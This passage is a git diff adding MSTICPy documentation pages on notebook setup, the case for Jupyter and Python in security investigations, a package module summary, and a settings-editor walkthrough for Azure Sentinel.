+Note: you do not need to have Python or any of the dependencies
+installed to view notebooks in nbviewer or GitHub.
+
+Notebook Setup
+--------------
+
+When it comes to running one of the notebooks in against real data, you
+will need some preparatory steps.
+
+Prerequisites
+^^^^^^^^^^^^^
+
+Permissions in your Azure Sentinel/Log Analytics Workspace
+""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
+
+In order to read any data, you will need to have at least LogAnalytics
+Reader role for your account.
+
+Configuring your Python Environment for the First Time
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+You will need to carry out this procedure every time you start working
+in a fresh Python environment.
+
+If you are using Notebooks for Azure using free computer, creating a new
+project is effectively starting a new environment (although there are
+ways to automate this setup). The exception to this is if you are using
+a dedicated Compute resource such as a `Data Science Virtual
+Machine <https://azure.microsoft.com/services/virtual-machines/data-science-virtual-machines/>`__.
+Since this machine is persisted and linked to your Notebooks for Azure
+account, all the configuration will be there next time you come to use
+it.
+
+If you are working locally or using another Jupyterhub hosted
+environment, you will only need to do this environment configuration for
+each fresh install or when you create a new python or conda virtual
+environment.
+
+Steps
+"""""
+
+1. Ensure that you have a version of Python 3.6 or later.
+
+2. Install the two main packages used by the notebook: Kqlmagic and
+   msticpy (see references at end of document). These will install most
+   of the dependencies needed by the notebooks if they are not already
+   installed.
+
+3. Install one or two additional python packages -- these vary depending
+   on the notebook.
+
+If you are running on a Windows machine where Python is installed for
+All Users, you may have to add the --user flag to the pip install
+commands. You will see permission failures when trying to install if
+this is the case.
+
+    ``pip install --user <pkg_name>``
+
+Notes for Conda users.
+
+If you are running in a Conda environment (an Anaconda distribution) run
+the pip commands from a Conda prompt, ideally in a dedicated Conda
+virtual environment. Just start an Anaconda prompt shell, paste the pip
+install commands into it and execute them, rather than running them from
+the notebook. You will need to run Jupyter from the same environment.
+More details of can be found
+`here <https://www.anaconda.com/using-pip-in-a-conda-environment/>`__.
+
+Keeping the packages up-to-date
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+It is a good idea to force an update of packages at regular intervals
+using
+
+    ``pip install --upgrade <pkg_name>``
+
+to ensure that you have the latest features and fixes (including fixes
+for security vulnerabilities).
+
+Notebook Initialization
+^^^^^^^^^^^^^^^^^^^^^^^
+
+There are two main pieces of housekeeping here that you need each time a
+notebook is started:
+
+1. Importing python libraries (this is reading in the installed versions
+   of the libraries so that they become accessible in your python
+   session). I try to keep all of the imports at the start of my
+   notebooks so that you have an early warning of missing dependencies.
+
+2. Authenticating to Azure Sentinel/Log Analytics with Azure Active
+   Directory. This is a complex topic but there are two main methods of
+   authentication:
+
+-  Interactive device/user authentication - this prompts you for user
+   credentials and a one-time device code. While this frees you from
+   having to worry about saving/pasting in credentials each time, you do
+   suffer a multi-prompt authentication experience. If you happen to be
+   working a long time in a single notebook this is not too onerous but
+   can be frustrating if you are hopping between multiple notebooks.
+
+-  `AppId
+   authentication <https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal>`__
+   - this uses an App account, created in your Azure Active Directory
+   tenant, and granted read access to your Log Analytics workspace. This
+   is a smoother authentication experience but means that you need to
+   manage the app client secret (and, hopefully, avoid leaving a copy of
+   it in a notebook uploaded to GitHub!).
+
+On successful authentication you should see a button displayed. Clicking
+this brings up a pop-up of the schema of all the tables your workspace
+and is a useful reference feature. This feature is also accessible from
+the notebook Help menu.
+
+.. figure:: _static/SentinelGettingStarted-KqlAuth.png
+   :alt: Kql magic Show Schema button
+
+   Kql magic Show Schema button
+
+References
+----------
+
+-  The `msticpy <https://github.com/microsoft/msticpy>`__ Python package
+   containing tools used in these notebooks developed by engineers on the
+   Microsoft Threat Intelligence team. It is available on
+   `GitHub <https://github.com/microsoft/msticpy>`__ along with several
+   notebooks documenting the use of the tools and on
+   `PyPi <https://pypi.org/project/msticpy/>`__.
+
+-  `Kqlmagic <https://github.com/microsoft/jupyter-Kqlmagic>`__ is a
+   Jupyter-friendly package developed by Azure's Michael Binstock.
+
+-  `Using Notebooks in Azure
+   Sentinel <https://docs.microsoft.com/azure/sentinel/notebooks>`__
+   is the official documentation for using Jupyter notebooks in Azure
+   Sentinel.
+
+Notebooks
+---------
+
+-  `Automating Security Operations Using Windows Defender ATP APIs with
+   Python and Jupyter
+   Notebooks <https://techcommunity.microsoft.com/t5/Windows-Defender-ATP/Automating-Security-Operations-Using-Windows-Defender-ATP-APIs/ba-p/294434>`__
+   by John Lambert
+
+-  Azure Sentinel Jupyter notebooks can be found
+   `here <https://github.com/Azure/Azure-Sentinel-Notebooks>`__ on GitHub.
+   - `Account Explorer <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Account.ipynb>`__
+   - `Domain and URL Explorer <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Domain%20and%20URL.ipynb>`__
+   - `IP Explorer <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20IP%20Address.ipynb>`__
+   - `Linux Host Explorer <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Linux%20Host.ipynb>`__
+   - `Windows Host Explorer <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Entity%20Explorer%20-%20Windows%20Host.ipynb>`__
+
+Other sample notebooks with saved data are in the `Sample-Notebooks <https://github.com/Azure/Azure-Sentinel-Notebooks/tree/master/Sample-Notebooks>`__
+folder:
+
+-  Windows Alert Investigation
+   in \ `github <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb>`__
+   or `NbViewer <https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Investigation%20-%20Process-Alerts.ipynb>`__
+
+-  Office 365 Exploration
+   in \ `github <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb>`__
+   or `NbViewer <https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Guided%20Hunting%20-%20Office365-Exploring.ipynb>`__
+
+-  Cross-Network Hunting
+   in \ `github <https://github.com/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb>`__
+   or `NbViewer <https://nbviewer.jupyter.org/github/Azure/Azure-Sentinel-Notebooks/blob/master/Sample-Notebooks/Example%20-%20Step-by-Step%20Linux-Windows-Office%20Investigation.ipynb>`__
diff --git a/docs/source/getting_started/JupyterAndSecurity.rst b/docs/source/getting_started/JupyterAndSecurity.rst
new file mode 100644
index 000000000..e393bc45e
--- /dev/null
+++ b/docs/source/getting_started/JupyterAndSecurity.rst
@@ -0,0 +1,182 @@
+Why Use Jupyter for Security Investigations?
+============================================
+
+What is Jupyter?
+----------------
+
+Jupyter is an interactive development and data manipulation environment
+hosted in a browser. It takes code that you type into a cell, executes
+it and returns the output to you. Here is an example:
+
+.. figure:: _static/JupyterAndSecurity-JupyterCell.png
+   :alt: Jupyter code cell executing simple for loop
+
+   Jupyter code cell executing simple for loop
+
+For more introductory information and sample notebooks go to
+`jupyter.org <https://jupyter.org>`__. and the `jupyter introductory
+documentation <https://jupyter.readthedocs.io/en/latest/tryjupyter.html>`__
+
+Why Jupyter?
+------------
+
+"Why would I use Jupyter notebooks to work with Azure Sentinel data
+rather than the built-in query and investigation tools?" might be your
+first question. And the first answer is that, usually, you wouldn't. In
+most cases, the scenario and data that you are investigating can be
+handled perfectly well in with the coming graphical investigation tool,
+with Log Analytics queries and cool case features like Bookmarks.
+
+One reason that you might want to reach for Jupyter is when the
+complexity of what you are looking for becomes too high. "How complex is
+*too complex*?" is a difficult question to answer but some guidelines
+might be:
+
+-  when the number of queries in your investigation chain goes beyond
+   around 7 (the number of things that the average person can juggle in
+   short-term memory).
+
+-  when you start to need extra-strength reading glasses to see all the
+   detail of the investigation graph.
+
+-  when you discover that your browser has just crashed and you hadn't
+   saved any of the queries or results that you were working on.
+
+Some of the other benefits of working in Jupyter are outlined in the
+following sections.
+
+Data Persistence, Repeatability and Backtracking
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+One of the painful things when working on a more complex security
+investigation is keeping track of what you have done. You might easily
+find yourself with tens of queries and results sets - many of which
+turned out to be dead ends. Which ones do you keep? How easy is it to
+backtrack and re-run the queries with different values or date ranges?
+How do you accumulate the useful results in a single report? What if you
+want to re-run the same pattern on a future investigation?
+
+With most data-querying environments the answer is a lot of manual work
+and heavy reliance on good short-term memory. Jupyter, on the other
+hand, gives you a linear progression through the investigation - saving
+queries and data as you go. With the use of variables through the
+progression of the queries (e.g. for time ranges, account names, IP
+addresses, etc.) it also makes it much easier to backtrack and re-run
+and to reuse the entire workflow in future investigations.
+
+Scripting and Programming environment
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+In Jupyter you are not limited to querying and viewing results but
+have the full power of a programming language. Although you can do
+a lot in a flexible declarative language like Kql (or others like SQL),
+being able to split your logic into procedural chunks is often helpful
+and sometimes essential. A *declarative* language means that you need
+to encode your logic in a single (possibly complex) statement, while
+*procedural* languages allow you to execute logic in a series of steps.
+
+Being able to use procedural code lets you:
+
+- See and debug intermediate results.
+- Add functionality (such as decoding fields, parsing data) that
+  may not be available in the query language.
+- Re-use partial results in later processing steps.
+
+Joining to External Data
+^^^^^^^^^^^^^^^^^^^^^^^^
+
+Most of your telemetry/event data will be in Azure Sentinel workspace
+tables but there will often be exceptions:
+
+-  data in an external service that you do not own - e.g. IP whois and
+   geolocation data, threat intelligence source,
+
+-  sensitive data that may only be stored within your organization - HR
+   Database, lists of execs, admins or high-value assets,
+
+-  or simply data that you have not yet migrated to the cloud.
+
+Any data that is accessible over your network or from a file can be
+linked with Azure Sentinel data via Python and Jupyter.
+
+Access to Sophisticated Data Processing, Machine Learning and Visualization
+^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
+
+Azure Sentinel and the Kusto/Log Analytics data store underlying it have
+a lot of options for visualization and advanced data processing (even
+clustering, windowed statistical and machine learning functions) and
+more capabilities are being added all the time. However, there may be
+times when you need something different: specialized visualizations,
+machine learning libraries or even just data processing and
+transformation facilities not available in the Azure Sentinel platform.
+You can see examples of these in some of the Azure Sentinel sample
+notebooks (see References at the end of the document).
+
+Some well-known examples of these in the Python language are:
+
+- *pandas* for data processing, cleanup and engineering
+- *matplotlib*, *holoviews*, *plotly* and many others for visualization
+- *numpy* and *scipy* for advanced numerical and scientific processing
+- *scikit-learn* for machine learning
+- *tensorflow*, *pytorch*, *keras* for deep learning
+
+Why Python?
+-----------
+
+Jupyter can be used with many different languages - what makes Python a
+good choice?
+
+Popularity
+^^^^^^^^^^
+
+It is very likely that you already have Python coders in your
+organization. It is now the most widely taught language in Computer
+Science courses and used widely in many scientific fields. It is also
+frequently used by IT Pros -- where it has largely replaced perl as the
+go-to language for scripting and systems management -- and by web
+developers (many popular services such as DropBox and Instagram are
+almost entirely written in Python).
+
+Ecosystem
+^^^^^^^^^
+
+Driven by this popularity, there is a vast repository of python
+libraries available on `PyPi <https://pypi.org>`__ and nearly 1 million
+python repos on `Github <https://github.com/search?q=python>`__. For
+many of the tools that you need as a security investigator - data
+manipulation, data analysis, visualization, machine learning and
+statistical analysis - no other language ecosystem has comparable tools.
+
+One remarkable point here is that pretty much every major python package
+and the core language itself are open source and written and maintained
+by volunteers.
+
+
+Alternatives to Python
+^^^^^^^^^^^^^^^^^^^^^^
+
+You can use other language kernels with Juypter, and you can mix and
+match languages (to a degree) within the same notebook using 'magics'
+that allow execution of individual cells using another language. For
+example, you could retrieve data using a PowerShell script cell, process
+the data in python and use JavaScript to render a visualization. In
+practice, this can be a little trickier than it sounds but certainly
+possible with a bit of hand-wiring.
+
+References
+----------
+
+- `jupyter.org <https://jupyter.org>`__
+- `python <https://python.org>`__
+- `PyPi <https://pypi.org>`__
+- `Github <https://github.com/search?q=python>`__
+- `Kusto Query Language <https://docs.microsoft.com/azure/kusto/query/>`__
+- `pandas <https://pandas.pydata.org/>`__
+- `matplotlib <https://matplotlib.org>`__
+- `holoviews <https://holoviews.org>`__
+- `plotly <https://plot.ly>`__
+- `numpy <https://www.numpy.org>`__
+- `scipy <https://www.scipy.org>`__
+- `scikit-learn <https://scikit-learn.org/stable/index.html>`__
+- `tensorflow <https://www.tensorflow.org/>`__
+- `pytorch <https://pytorch.org>`__
+- `keras <https://keras.io/>`__
diff --git a/docs/source/getting_started/PackageSummary.rst b/docs/source/getting_started/PackageSummary.rst
new file mode 100644
index 000000000..220a9ad2b
--- /dev/null
+++ b/docs/source/getting_started/PackageSummary.rst
@@ -0,0 +1,343 @@
+Package Summary
+===============
+
+.. note:: This document is intended to summarize most of the functionality of
+   *MSTICPy* in a single page but it is difficult to keep it up-to-date.
+   You may find it easier to use the ReadTheDocs menu to browse around
+   the various functions of this package.
+
+
+Data Acquisition and Queries
+----------------------------
+
+See :doc:`../DataAcquisition`
+
+QueryProviders
+~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.data.data_providers.QueryProvider`
+
+Extensible query library targeting Log Analytics, Splunk, OData
+and other log data sources. Also special support for Mordor data
+sets and using local data.
+
+Built-in parameterized queries allow complex queries to be run
+from a single function call. Add your own queries using a simple YAML
+schema.
+
+See :doc:`../data_acquisition/DataProviders`
+
+Sample notebook - `Data Queries Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Data_Queries.ipynb>`__
+
+
+Data Processing and Enrichment
+------------------------------
+
+
+Threat Intelligence Providers
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.tilookup`
+
+The TILookup class can lookup IoCs across multiple TI providers. builtin
+providers include AlienVault OTX, IBM XForce, VirusTotal and Azure Sentinel.
+
+The input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Depending on the provider, you may require an account
+and an API key. Some providers also enforce throttling (especially for free
+tiers), which might affect performing bulk lookups.
+
+See :doc:`../data_acquisition/TIProviders`
+
+Sample notebook - `TILookup Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TIProviders.ipynb>`__
+
+vtlookup and vtlookupv3
+~~~~~~~~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.vtlookup`
+
+Wrapper class around `Virus Total
+API <https://www.virustotal.com/en/documentation/public-api/>`__.
+Processing requires a Virus Total account and API key.
+Supported IoC Types:
+
+-  Filehash
+-  URL
+-  DNS Domain
+-  IPv4 Address
+
+Sample notebook - `VTLookup Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/VirusTotalLookup.ipynb>`__
+
+IP geo-location lookups
+~~~~~~~~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.geoip`
+
+Geographic location lookup for IP addresses. This module has two classes
+for different services:
+
+-  GeoLiteLookup - Maxmind Geolite (see https://www.maxmind.com)
+-  IPStackLookup - IPStack (see https://ipstack.com) Both services offer
+   a free tier for non-commercial use. However, a paid tier will
+   normally get you more accuracy, more detail and a higher throughput
+   rate. Maxmind geolite uses a downloadable database, while IPStack is
+   an online lookup (API key required).
+
+See :doc:`../data_acquisition/GeoIPLookups`
+
+Sample notebook - `GeoIP Lookup Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/GeoIPLookups.ipynb>`__
+
+Azure Resource Data, Storage and Azure Sentinel API
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.data.azure_data`
+:py:mod:`msticpy.data.azure_sentinel`
+:py:mod:`msticpy.data.azure_blob_storage`
+
+The AzureData module contains functionality for enriching data regarding Azure host
+details with additional host details exposed via the Azure API. The AzureSentinel
+module allows you to query incidents, retrieve detector and hunting
+queries. AzureBlogStorage lets you read and write data from blob storage.
+
+See :doc:`../data_acquisition/AzureData`, :doc:`../data_acquisition/Sentinel`
+:doc:`../data_acquisition/AzureBlobStorage`
+
+
+Pivot Functions
+~~~~~~~~~~~~~~~
+:py:mod:`msticpy.data_model.pivot`
+:py:mod:`msticpy.data_model.entities`
+
+Lets you use *MSTICPy* functionality in an "entity-centric" way.
+All functions, queries and lookups that relate to a particular entity type
+(e.g. Host, IpAddress, Url) are collected together as methods of that
+entity class. So, if you want to do things with an IP address, just load
+the IpAddress entity and browse its methods.
+
+See :doc:`../data_analysis/PivotFunctions`
+
+
+Security Analysis
+-----------------
+
+Anomalous Sequence Detection
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.analysis.anomalous_sequence.anomalous`
+
+Detect unusual sequences of events in your Office, Active Directory or other log data.
+You can extract sessions (e.g. activity initiated by the same account) and identify and
+visualize unusual sequences of activity. For example, detecting an attacker setting
+a mail forwarding rule on someone's mailbox.
+
+See :doc:`../data_analysis/AnomalousSequence`
+
+Sample notebook - `Anomalous Sequence Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/AnomalousSequence.ipynb>`__
+
+Time Series Analysis
+~~~~~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.analysis.timeseries` and :py:mod:`msticpy.sectools.timeseries`
+
+Time series analysis allows you to identify unusual patterns in your log data
+taking into account normal seasonal variations (e.g. the regular ebb and flow of
+events over hours of the day, days of the week, etc.). Using both analysis and
+visualization highlights unusual traffic flows or event activity for any data
+set.
+
+See :doc:`../visualization/TimeSeriesAnomalies`
+
+Sample notebook - `Time Series <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/TimeSeriesAnomaliesVisualization.ipynb>`__
+
+eventcluster
+~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.eventcluster`
+
+This module is intended to be used to summarize large numbers of events
+into clusters of different patterns. High volume repeating events can
+often make it difficult to see unique and interesting items.
+
+The module contains functions to generate clusterable features from
+string data. For example, an administration command that does some
+maintenance on thousands of servers with a commandline such as:
+``install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback``\  can
+be collapsed into a single cluster pattern by ignoring the character
+values in the string and using delimiters or tokens to group the values.
+
+This is an unsupervised learning module implemented using SciKit Learn
+DBScan.
+
+See :doc:`../data_analysis/EventClustering`
+
+Sample notebook - `Event Clustering Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventClustering.ipynb>`__
+
+outliers
+~~~~~~~~
+
+:py:mod:`msticpy.sectools.outliers`
+
+Similar to the eventcluster module but a little bit more experimental
+(read 'less tested'). It uses SkLearn Isolation Forest to identify
+outlier events in a single data set or using one data set as training
+data and another on which to predict outliers.
+
+
+Visualization
+-------------
+
+This is a collection of display and utility modules designed to make
+working with security data in Jupyter notebooks quicker and easier.
+
+See :doc:`../Visualization`
+
+Process tree
+~~~~~~~~~~~~
+
+:py:mod:`msticpy.nbtools.process_tree` - process tree visualization.
+
+The process tree functionality has two main components:
+
+-  Process Tree creation - taking a process creation log from a host and building
+   the parent-child relationships between processes in the data set.
+-  Process Tree visualization - this takes the processed output displays an interactive process tree using Bokeh plots.
+
+There are a set of utility functions to extract individual and partial trees from the processed data set.
+
+See :doc:`../visualization/ProcessTree`
+
+Sample notebook - `Process Tree Visualization <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/ProcessTree.ipynb>`_
+
+Event timeline
+~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.nbtools.timeline` - event timeline visualization.
+
+Display any log events on an interactive timeline. Using the
+`Bokeh Visualization Library <https://bokeh.org/>`__ the timeline control enables
+you to visualize one or more event streams, interactively zoom into specific time
+slots and view event details for plotted events.
+
+See :doc:`../visualization/EventTimeline`
+
+Sample notebook - `Event Timeline Visualization <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/EventTimeline.ipynb>`_
+
+
+Notebook widgets
+~~~~~~~~~~~~~~~~
+
+:py:mod:`msticpy.nbtools.nbwidgets`
+
+Common functionality such as list pickers, time
+boundary settings, saving and retrieving environment variables into a
+single line callable command.
+
+See :doc:`../visualization/NotebookWidgets`
+
+Sample notebook - `Event Clustering Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/NotebookWidgets.ipynb>`__
+
+
+Utility Functions
+-----------------
+
+base64unpack
+~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.base64unpack`
+
+Base64 and archive (gz, zip, tar) extractor. Input can either be a
+single string or a specified column of a pandas dataframe. It will try
+to identify any base64 encoded strings and decode them. If the result
+looks like one of the supported archive types it will unpack the
+contents. The results of each decode/unpack are rechecked for further
+base64 content and will recurse down up to 20 levels (default can be
+overridden). Output is to a decoded string (for single string input) or
+a DataFrame (for dataframe input).
+
+See :doc:`../data_analysis/Base64Unpack`
+
+Sample notebook - `Base64Unpack Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/Base64Unpack.ipynb>`__
+
+iocextract
+~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.iocextract`
+
+Uses a set of builtin regular expressions to look for Indicator of
+Compromise (IoC) patterns. Input can be a single string or a pandas
+dataframe with one or more columns specified as input.
+
+The following types are built-in:
+
+-  IPv4 and IPv6
+-  URL
+-  DNS domain
+-  Hashes (MD5, SHA1, SHA256)
+-  Windows file paths
+-  Linux file paths (this is kind of noisy because a legal linux file
+   path can have almost any character) You can modify or add to the
+   regular expressions used at runtime.
+
+Output is a dictionary of matches (for single string input) or a
+DataFrame (for dataframe input).
+
+See :doc:`../data_analysis/IoCExtract`
+
+Sample notebook - `IoCExtract Usage Notebook <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/IoCExtract.ipynb>`__
+
+
+auditdextract
+~~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.auditdextract`
+
+Module to load and decode Linux audit logs. It collapses messages
+sharing the same message ID into single events, decodes hex-encoded data
+fields and performs some event-specific formatting and normalization
+(e.g. for process start events it will re-assemble the process command
+line arguments into a single string).
+
+
+syslog_utils
+~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.syslog_utils`
+
+Module to support the investigation of Linux hosts through Syslog.
+Includes functions to create host records, cluster logon events, and
+identify user sessions containing suspicious activity.
+
+cmd_line
+~~~~~~~~
+
+:py:mod:`msticpy.sectools.cmd_line`
+
+Module to investigation of command line activity. Allows for the detection
+of known malicious commands as well as suspicious patterns of behaviour.
+
+domain_utils
+~~~~~~~~~~~~
+
+:py:mod:`msticpy.sectools.domain_utils`
+
+Module to support investigation of domain names and URLs with functions to
+validate a domain name and screenshot a URL.
+
+
+
+Data Masking
+~~~~~~~~~~~~
+:py:mod:`msticpy.data.data_obfus`
+
+Lets you obfuscate senstive data in logs to allow sharing, presentations
+without compromising privacy.
+
+See :doc:`../data_acquisition/DataMasking`
+
+Supported Platforms and Packages
+--------------------------------
+
+-  msticpy is OS-independent
+-  Requires Python 3.6 or later
+-  See `requirements.txt <https://github.com/microsoft/msticpy/blob/master/requirements.txt>`__
+   for more details and version requirements.
diff --git a/docs/source/getting_started/SettingsEditor.rst b/docs/source/getting_started/SettingsEditor.rst
new file mode 100644
index 000000000..1f6119c30
--- /dev/null
+++ b/docs/source/getting_started/SettingsEditor.rst
@@ -0,0 +1,916 @@
+*MSTICPy* Settings Editor
+=========================
+
+The Settings editor is a collection of classes that let you manage and edit
+your **MSTICPy** settings.
+
+This document is a walkthrough of using these classes to create your settings
+from scratch.
+
+There is also a notebook that follows this flow. You can download
+and use this to configure your settings -
+`MPSettingsEditor <https://github.com/microsoft/msticpy/blob/master/docs/notebooks/MPSettingsEditor.ipynb>`__
+
+You should also read the companion document
+:doc:`*MSTICPy* Package Configuration <msticpyconfig>`, which has
+more information about individual settings.
+
+To load the editor classes run the following.
+
+.. code:: ipython3
+
+    from msticpy.config import MpConfigFile, MpConfigEdit
+
+This loads MpConfigFile - a tool to manage settings files - and
+MpConfigEdit. MpConfigEdit is the user interface for adding and editing
+individual settings.
+
+.. warning:: Creating and editing your settings will likely involve displaying
+   secrets such as API Keys in the Jupyter notebook that you are using
+   to edit the settings.
+
+   These secrets may be persisted in the notebook you are using and in
+   the checkpointed auto-save copy that Jupyter keeps in the ``.ipynb_checkpoints``
+   sub-folder. To remove these, clear all cell outputs and then save the notebook.
+   This should remove any output from both the main copy of the notebook
+   and the checkpoint copy. For the very security-conscious, it is also a
+   good idea to clear your browser cache, or use the settings notebook in
+   *private* mode.
+
+   These secrets are never normally displayed by *MSTICPy*, nor are they
+   stored in the browser memory so should never appear in your
+   browser cache. When editing or displaying those settings though, **both** of
+   these happen. Caveat emptor!
+
+Checking your existing settings
+-------------------------------
+
+You can use MpConfigFile from the command line or as an interactive UI
+to do this.
+
+.. code:: ipython3
+
+    mpconfig = MpConfigFile()
+    mpconfig.load_default()
+    mpconfig.view_settings()
+
+
+.. figure:: _static/mp_config_file_settings.png
+   :alt: MSTICPy settings showing in MpConfigFile viewer
+
+   image.png
+
+If you see nothing but a pair of curly braces in the settings view above it means that you
+should set up a ``msticpyconfig.yaml``.
+
+.. figure:: _static/mp_config_file_no_settings.png
+   :alt: MSTICPy empty settings showing in MpConfigFile viewer
+
+
+.. note:: If you know that you have configured a ``msticpyconfig`` file
+   you can search for this file using MpConfigFile. Click on **Load file**
+   and browse to or search for the file.
+   Once you’ve done that go to the `Setting the path to your
+   msticpyconfig.yaml <#Setting-the-path-to-your-msticpyconfig.yaml>`__
+   to set your MSTICPYCONFIG environment variable.
+
+Import your Config.json and create a msticpyconfig.yaml (Azure Sentinel)
+------------------------------------------------------------------------
+
+Azure Sentinel creates a ``config.json`` file in the root of your
+notebooks user folder. This contains configuration details about the
+Azure Sentinel workspace that you launched the notebook from. However,
+the format is slightly different to the settings format used by **MSTICPy**.
+
+Follow these steps to find and convert your ``config.json``:
+
+1. Run ``MpConfigFile()`` (see the code immediately below)
+2. Locate your ``config.json``
+
+   - click the **Load file** button. There are two options for finding
+     a file.
+   - Browse - use the controls to navigate to find config.json
+   - Search - set the starting directory to search and open the
+     **Search** drop-down
+   - When you see the file click on it to select it and
+     click **Select File** button (below the file browser). The **Select File**
+     button will act on the last file you selected - whether in the file directory
+     listing or the search results.
+   - optionally, click **View Settings** to confirm that the settings in the
+     ``config.json`` look right
+
+3. Convert the config settings to msticpyconfig format
+
+   - click **Convert to MP**
+   - click **View Settings**
+
+4. Save the file
+
+   - type a path into the **Current file** text box
+   - Click on **Save file**
+
+5. You can set this file to always load by assigning the path to
+   an environment variable. See `Setting the path to your
+   msticpyconfig.yaml <#Setting-the-path-to-your-msticpyconfig.yaml>`__
+
+.. code:: ipython3
+
+    mpconfig = MpConfigFile()
+    mpconfig
+
+.. figure:: _static/settings_mp_file_config_view.png
+   :alt: Imported settings from config.json
+
+This is the equivalent of the previous steps from the command line, which
+is probably faster if you know where your config file is.
+
+.. code:: ipython3
+
+    mpconfig = MpConfigFile()
+    mpconfig.load_from_file("E:\\src\\asi-jupyter\\notebooks\\config.json")
+    mpconfig.map_json_to_mp_ws()
+    mpconfig.settings
+
+
+.. code:: ipython3
+
+    {'AzureSentinel': {'Workspaces': {'ASWorkspace': {'ResourceGroup': 'ASWorkspaceRG',
+        'SubscriptionId': '2c1bc08d-6a9e-43f0-aa55-a84f383b1a6b',
+        'TenantId': '3f3fb3df-3c79-4407-8043-4a765430db0e',
+        'WorkspaceId': '722f602f-340e-47a1-8d0a-c2b6a8fbc4c4'}}}}
+
+
+
+Edit your msticpyconfig settings
+--------------------------------
+
+MpConfigEdit
+~~~~~~~~~~~~
+
+To do this we'll be using the configuration editor MpConfigEdit.
+It uses a tabbed interface to show different settings sections.
+
+.. figure:: _static/settings_mp_conf_edit.png
+   :alt: Configuration editor Interface.
+
+As well as showing settings, there is text box to input a file name to
+save the settings to - with a corresponding **Save Settings** button.
+
+.. note:: Each settings tab has a **Save** button. This saves changes on
+   the current editor screen to an in-memory copy of your settings. They
+   are not saved to a file until you enter a file name and click on
+   **Save Settings**.
+
+The **Validate Settings** also lets you check on the status of the settings.
+It does a logical check (for sections/settings that you probably need) as
+well as a structural check to make sure that setting syntax is specified
+correctly. The results of the validation are shown in a text view box.
+Close this when you are done with the **Close** button.
+
+There is also help for the settings available on each tab, with links
+to more detailed documentation.
+
+.. figure:: _static/settings_help.png
+   :alt: Displaying help in the configuration editor
+
+MpConfigEdit has a single parameter ``settings``. This can take be:
+
+- a file path - it will try to load settings from the file.
+- an instance of ``MpConfigFile`` - it will load the settings loaded by
+  this tool. This is useful if you need to search for a file using MpConfigFile
+  and then edit the settings.
+- a settings dictionary - the msticpyconfig settings converted from YAML into
+  a Python dictionary
+
+If you don't supply any value for ``settings`` it will try to load your default
+settings using the MSTICPYCONFIG environment variable.
+
+
+Azure Sentinel Workspaces
+~~~~~~~~~~~~~~~~~~~~~~~~~
+
+If you loaded a config.json file you should see your workspace
+displayed. If not, you can add one or more workspaces here. The Name,
+WorkspaceId and TenantId are mandatory. The other fields are helpful but
+not essential.
+
+Use the **Help** drop-down panel to find more information about adding
+workspaces and finding the correct values for your workspace.
+
+If this the workspace that you use frequently or all of the time, you
+may want to set this as the default. This creates a duplicate entry
+named “Default” and this is used when you connect to AzureSentinel as
+the default workspace to connect to (you can override this by specifying
+a workspace name at connect time).
+
+When you’ve finished, type a file name (usually “msticpyconfig.yaml”)
+into the **Conf File** text box and click **Save File**,
+
+You can also try the **Validate Settings** button. This should show that
+you have a few missing sections (we’ll fill these in later) but should
+show nothing under the the “Type Validation Results”.
+
+.. code:: ipython3
+
